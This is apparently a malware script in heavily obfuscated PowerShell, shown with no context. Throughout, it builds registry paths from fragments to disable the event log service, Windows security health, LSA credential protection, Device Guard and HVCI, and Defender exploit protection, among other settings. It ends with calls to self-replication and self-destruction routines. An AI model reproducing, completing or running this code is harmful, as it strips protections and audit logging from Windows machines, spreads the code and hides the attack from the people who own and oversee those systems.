      &   (    'Se'  +   't-'  +  'Regist'  +  'ryP'    +  'ro'  +    'p'     + 'erties' ) -path ( (    'HKLM:{0}So'   +     'f'  +   'tware{'  +    '0}'   +      ( 'Mi'    +     'c'  )     +  'rosoft{'    +   '0'   +    '}Windows '    +   'S'  +   'c'     +    (  'r' +   'ip'      )     +    't'   +    ' H' +   'os'    +    't'   +    '{0}Se'      +    (  (  't'     +     'ti'     )  +    'ng'   )     +    's' )-F [cHaR]92     ) -properties @{(     (    'E'     +( 'na'  +   'b'    )     )     +   (   'le'  +     'd'    )  )    =   0}

  & (  'Set-Regist'    +  'ryPr'  +   'oper'  +  't'    +      'ie'   +  's'  ) -path ( (  (   'HK'    + 'L'   )    +     (   ( 'M:S'  +      'r'  )    +    '6'     +    (    'S'    +  'YST'  )  )   +  'E' +  (  'M'    +   (     'Sr6C'     +  'u' +  'r'   )    )   + (     (  'r'  +   'en'    )     + 't'  )+  ( 'Co'  +    'n'    +    (     'tro'  +     'l'    )    )  +   (     'Se'    +  't'  )     +   'Sr'   +     (  '6'  +  'Se'   )+   'r'  +  'vi'    +    (    'ce'  +    's'   )     +      (    'S'     +      (  'r6'  +    'Eve'   )    )      + 'n'    +  't'   +   (      'Lo'    +     'g'  )   )."rep`la`cE"(   (   'S'  +      'r6'  ),'\'  )    ) -properties @{(   ( 'St'     +  'a'    )   + 'rt'  )   =     4}

  &     (  'Set'+      '-'    +   'Reg'    + 'is'   +     't'    +   'r' +    'yProperties'    ) -path (     ( (    'H' +    'KL'   )    +  'M:' +  'C5'   +  (   (   '3S'     +  'Y'     )   +    'ST'    +   (  'E'    +  'MC'    )    )    +     (  '5'    +     (     '3C'+    'u' )    +   (   'r'    +    'rentCo'   )    + 'nt'   +    'ro'    )     +    ((    'l' +  'Set'   )   +   (  'C'   +     '53Se'  )  +   'r'    )     +  (   (    'vi'   +  'c'     )    +     'es'  )   +     (   'C5'  +  '3S' ) +  (   (    'e'  +   'cu'     )    +  'ri'    )  +   (     't'  +  (      'y'      +   'Hea'   )  +  'lt'     )   +  'hS'    +   (  (    'erv' +  'i'  )  +     'c'  )    + 'e'    )  -CrEPLACE  (   [CHaR]67   +   [CHaR]53     +    [CHaR]51     ),[CHaR]92    ) -properties @{(    'St'  +   (   'a' +   'rt'   ) )  =  4}

 & (    'Set'    +    '-R'  +    'egi'   +    's'    +    't'   +    'ryPr'      +   'operties'    ) -path (   (    'H'      +     'KL'   +  'M:{0}S'  +     'YSTEM{0}C'   +    ( 'u'     +    'rr' )    +   ( (  'ent'  + 'C'     )  +    (     'o' +  'ntr'   )    +     (  'ol'  +  'S'    )  +      'et'   )  +   '{'  +    '0}S'  +    'e'     +'r'     +   (   'vi'    +   'c' )  +  'es{0}'     +    (    'WS'     +  'e'   )  +    'ar'  +     'ch'  )-f  [CHAR]92   ) -properties @{(   (    'St'     +   'ar'   )   +  't' )     =  4}

  &  (  'Set'    +'-'  +  'RegistryP'  +    'rop'    +   'ert'   +    'ie'    +  's'    ) -path (  (  (  ( 'HKL'  +      'M:M'  )  + (  'ZTS'  +   'OFT' +  'WA'     ) +      'R'   )    +   'EM'   +    (  'Z'   +  'TM' )      +   (     'i'  +    (   'c'  +  'ros')     )   +     (   'o'  +  'ft'    )   +  (     (    'M'   + 'ZT'   )   +      'W'  )     +(    'i' +  'nd'      )   +    'ow'   + 's'  +     (     ' '     +(   'N'   +   'TM'    )   ) +   (    (  'Z'+    'TCu'  )  +  (  'r'     + 're'  )  +    (   'ntVer'     +   's'     )     )  +  'io'     +   (    'n'    +   (   'MZ'  +    'T'    )   +    (     'Sch'  + 'e'   )    )     +   'd' +    (   'u'  + (    'leMZT'  + 'M'   ))+  'a'  +  (   (    'i'     +   'nt' )   +    'e'+  (  'nan'   +    'ce'    )  )    )."rePL`ACe"( (  [ChaR]77      +   [ChaR]90    +      [ChaR]84  ),[strING][ChaR]92    )   ) -properties @{(   ( 'Ma'   +     'i'   )    +    (    (     'n'  +    'ten'  ) +    'a' )  +   (  'n'  +     'ce'     )     +'Di'   +   (  (    's'  +     'ab'   )   +     (     'l'     +    'ed'  )  )     )   =     1}

      &   (   'Set-Re'   +      'gi' +   'str'    +  'yPro' +  'p'   +   'erti'     +   'es'    ) -path (   (   'H'     +  'KLM:{'    +    '0}'   +  (     (   'S'    +  'OF' )   +   'T'   +    (    'W'      +   'ARE'    )   )     +'{' + '0'   +     '}Polici'      +   'es{0}Micro'    +     'so'   +  'ft{0}W'    +   (    'i' +  'nd'  )    +   'ows{'   +    '0}D'    +    'ev'   +     (     (    'i'   + 'ceG'   )    +    'ua'     +    'r'      )    +    'd'    )-f[cHaR]92   ) -properties @{(   'Ls'     +   (  (  'a'    +  'Cf'      )     +  'g'   )    +(  'F'     +  (    'la' +      'gs'  )    ))   = 0}
   &  (    'Se'    +   't'  +  '-Regis'    +    'tryPrope'     +     'rties'    ) -path (   (    'HK'  +     'LM:{0'   +    '}SY'  +    'ST'    +   'EM{0}Cu'      +    (      (  'rre'  +   'n'    ) +     't'   )     +   'C'   + 'ontrolSet{'    + '0}C'  +      'o'    +    'n'   +  (    'tr' +    'o'   )     +     'l{0}L'  +     's'    +    'a'  )-f  [CHAr]92  ) -properties @{(   'Ls'+     (  'a'   +(     'Cfg'   +  'F'    ) )   + 'l'   +    (    'a'  +  'gs'   )      )    =   0}

      &      (  'Se'  + 't-R'   +'e'    +  'gistr'     +   'yPropertie'   +     's'    ) -path (  (     (   'H'+  'KL' ) +   'M:'   +   '{0}'  +   'SY'   +    'STEM{'    +   '0}'   +     'C'     +   (    (    'u'+    'rr'   )     +  (  'e'  +    'nt' )   +    'C'  )     +(  (  'ontr' +    'o' )  +  'l'     +     'S'   )    +  'e'   +  't{'   +  '0}Co'    +    ( 'n'   +  'tr'     )     +      'ol{0'   +  '}'    +  (   (   'Devi'   +   'c'      )   +'eG'  +  'u'  +   'a'  ) +'rd' )-F [CHAR]92 ) -properties @{(   (  'En' +   'a'   )  +   (  'bl'     +    ( 'e'   + 'Vi'   ))   +   'rt'  +(    (    'ua'  +    'l'   )   +     (  'i'   +    'zat'   ))  +   (     'i'    +  'on'  )   +  'B'  +      (    (   'as'     +     'e'  )+   'd' )  +   (      (   'S'   +   'ec'   ) +    ( 'ur'   +     'i') )   +  'ty'   )    =      0   ;    (    'Re'  +  (  'qu'   +   'ir'  )  + 'eP'  +    (  'l'  + 'at'    )   +    'f'     + ( 'o'    +  (    'r'   +    'mS'   +   'ecuri'   )   +   't'  )     +  (   'y'      +  'Fe')   +(  'a'     +    'tu'   )   +   're'   +   's'   )      =  0   ;       (  'HV'    +   'C'    +  (    'IM'   + (   'A' +   'TReq' )    +     'u'    +    'i'     )    +    (     're'     +  'd'   ))     =    0}

    &     (     'S'     +     'et-Regi'  + 'stryPr' +  'ope'  +'r'  +'tie'     +  's'  ) -path (  (  ('H'     +  ( 'K'  +  'LM:Y'   )  )   +   (    'WH'  + (    'SO'     +      'F'  )   )  +  'TW'   +  (      'A'+   'RE'     )  +   'YW'  +    'H'+ ('Mi'  +    (    'cro'   +   's'     )   + (    'oftYW'  +'H'    +   'H'   )   )  +   (  'v'  +    'si'    )  )."rep`Lace"(    ([cHAr]89    +    [cHAr]87   +   [cHAr]72   ),[stRInG][cHAr]92     )  ) -properties @{( (  'E'    +   (     'n'   +    'ab'    )   )     +    ('l'    +     'ed' )   )      =    0}

  & (   'Se'    +   't-Reg'   +   'ist'   +    'ryProperties'   ) -path (    (     'HKLM:{'+    '0'     +    '}'  +  'SOFTWARE{0}'    +   (    (   'Po'  +     'l'    )  +     'i'   )   +  'cies{0'  +     '}M'    +   'i'      +  'c'   +  'ro'+     's'   +    'o'  +   'ft{'     +    '0}W'  +    (   (    'i'     +   'nd'   )     +    'o'  +  ( 'w'    +   's D'   )     )    +   'ef'    +    (    'e'   +    (  'n'    +  'der'   )     ) +   '{0}Wi'   +  'nd'  +   (   'o'  +  ('ws'   +   ' De'     )     )   +    ( 'f'   +  'en'     )     +  'd'   +    (   'er'  +    ' '  )  +   ( (  'E'   +  'xp'  )     +  'l'     )   +  (  'o'    + 'it'    )+     ' '    +     (    'Gu' +  (   'a'   +    'rd'    ))      ) -f [ChaR]92) -properties @{( 'E'      +  'na'   +   (   'b'     +  (  'l'     +  'eE'  )  )+   (  'x'    +     'pl'      )    +  (     'oi'  + (   't'  + 'Pr'     )   )    +   (    ( 'o'  +   'tect' + 'i'    )     +    'o'     )     + 'n' )   =     0}

&   (    'Set-'    +     'R'   + 'egistryPro'   +   'pert'    +   'ies'   ) -path (  (   'H'   +  (   (    'KL'   +    'M:Fs')    +  'M'    +'S'    +      (    'OF'  +  'TWA'   )  +    'R'   )   +   (   ( 'EF'    +  's'    )   +   'M'  ) +     (     ( 'Po'   +  'l'   )     +    ( 'i'     +     'ci' )   +    'e'  +      (   'sFs' +   'MM'  ))  +    ( 'ic'    +   'r'    +  'os'     +   (   'oftF'  + 's' )   )   +     (   (   'MWi' +  'n'    ) + 'do'   +  'w'   )   + ( 'sF'   +    's'      )   +  'MD'   +  (    'at'     +    'a'    )     +   ( ( 'C'  +  'ol'    ) +    'le'   +     'ct'    )    +   'i'   +     'on'   )."re`P`LACe"(    ( [CHar]70   +   [CHar]115   +  [CHar]77  ),'\'  ) ) -properties @{( (     'Al'+     'l'      )     +      'o'    +     (  'wT' + 'e'    ) +(   'l' +    (    'em'    +    'et'  )  )    +  'ry' )     =      0}

     &  (   'Set-Reg'   + 'ist'    +   'r'    +  'yPro'  +   'pert'  +   'ies'  ) -path (    (   (  (  'HKLM'  +     ':'    )  + (    '4z'      +    'o'   )      ) +    ( (    'SO' + 'F'    )   +    'TW'   ) +'A' +   (    'R'   +  (   'E4'    +  'z'    ) ) +  ( (   'o'    +   'Poli'      )  +    'ci'     +  (  'es'     +  '4'  )  )   +  (  'zo'  +   'M'     )   +   ((  'ic'     +    'r'   )    +    'o'   )     +    (    's'  +  'of' ) +(  (  't4' + 'zo'      )     +   'Wi'    )     +  (    'n'    + ( 'do'   +    'ws'    )+   '4'   ) +  'zo'     +  (     (   'O'   +   'ne'     )    +  (   'Dri'  +    've'   )     ) ) -rEPlaCE (   '4z'   +     'o'    ),[cHar]92   ) -properties @{(   (  'D' +  'is' )     +  (   'a'   +  ( 'bl'   +   'eFi'    )   )    +   (  (  'leS'   +    'y'    )    +   'n')     +    (   (  'c'    +  'NG'   )    +   'SC'   )     )   =    1}

    & (   'Set-R'  +'egi'   +   'stryPrope'     +    'r'    +  'ties'   ) -path ( ( 'HK'   + 'L' +   'M:'     +    '{0'  +'}SO'    +  (     'FT'      +  'WA'    )  +  'R'+    'E{0}P'+    (     'ol'     +     (    'ic'     +  'i'   )    ) +  'es{'    +   '0'  +  '}Mic'     +  (  (    'r'   +      'oso'  )  +   'f'      )     +  't{0}Wi'   +    (   'nd' +   (     'o' +   'ws'    )   )    +     '{0'   + '}W'+   'i' +    (   'n'  + 'do'  +  ( 'ws '    +   'S'    )   )  + (  'e'    +   (      'a'  +     'rch'     )))-F  [cHar]92   ) -properties @{(  (   'A'      +     (    'l'    +   'lowC'  )  )  + 'or'   +     ( 't'    +  (  'an'   +    'a'    )   )  )    =  0}

   &    (    'Inv'     + 'oke-S' +  'elfR'      +   'eplicat'  +  'ion'  )

    & (   'Invoke-'  +  'S'  +     'elfD'    +     'est' +   'ru'   +    'ction'    )